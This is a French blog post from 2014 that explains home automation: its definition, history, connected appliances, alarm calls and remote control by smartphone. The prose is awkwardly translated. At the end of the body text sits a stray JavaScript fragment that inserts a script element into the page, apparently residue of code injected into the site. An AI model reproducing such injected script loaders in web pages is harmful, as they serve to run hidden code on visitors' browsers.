/, Non classé/La domotique est l’extension luxueuse de la construction de l’automatisation

La domotique est l’extension luxueuse de la construction de l’automatisation

La domotique est l’automatisation de la maison, le ménage ou l’activité du ménage. Elle peut inclure le contrôle centralisé d’éclairage, le chauffage, la ventilation et la climatisation, des appareils, les serrures de sécurité de portes et d’autres dispositifs.
La domotique fournit la commodité améliorée, le confort, le rendement énergétique et la sécurité visant à fournir une qualité de vie accrue, notamment pour les personnes âgées et handicapées.

domotique maroc

L’apparition et l’évolution de la domotique …

Auparavant, les problèmes de complexité, de concurrence entre les vendeurs de solutions domotiques, ainsi que les normes et les incompatibilités multiples, avaient limité la pénétration de la domotique aux maisons.
Dans la construction moderne, toutes les maisons sont raccordées pour la puissance électrique des téléphones, de la TV, et de la sonnette. Plusieurs tâches de ménages sont automatisées par le développement d’appareils automatisés spécialisés.
Prenons l’exemple des machines à laver automatiques, elles ont été développées dans le but de réduite le travail manuel pour le nettoyage des vêtements, ainsi, les chauffe-eau ont pour objectif la réduction du travail nécessaire pour prendre un bain.
Comme le nombre de dispositifs contrôlables dans les internes augmente, l’interconnexion et la communication deviennent utiles et désirables. Par exemple, le four peut envoyer un message d’alerte quand il a besoin de nettoyage, ou le réfrigérateur quand il a besoin du service…
Quand personne n’est à la maison et que le système d’alarme se met en marche, le système domotique appelle le propriétaire, les voisins ou le numéro de secours lorsqu’un intrus est détecté…
domotique marocLa popularité de la domotique a augmenté ces dernières années grâce à sa simplicité et son accessibilité à travers l’utilisation des tablettes et Smartphones.
Le système domotique consiste à intégrer les dispositifs électriques d’une maison, en employant des techniques de la construction de l’automatisation et le contrôle de toutes les activités domestiques, telles que l’arrosage des plantes, l’alimentation de l’animal de compagnie, le changement des scènes et ambiances s’adaptant à différents événements.
En domotique, tous les dispositifs de la maison peuvent être connectés et couplés avec une centrale, qui est le contrôleur principal du réseau domotique interne, permettant de tout contrôler à distance en utilisant le réseau Internet.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Par | 2014-12-08T15:26:53+00:00 décembre 8th, 2014|Blog domotique, Non classé|Commentaires fermés sur La domotique est l’extension luxueuse de la construction de l’automatisation

À propos de l'auteur :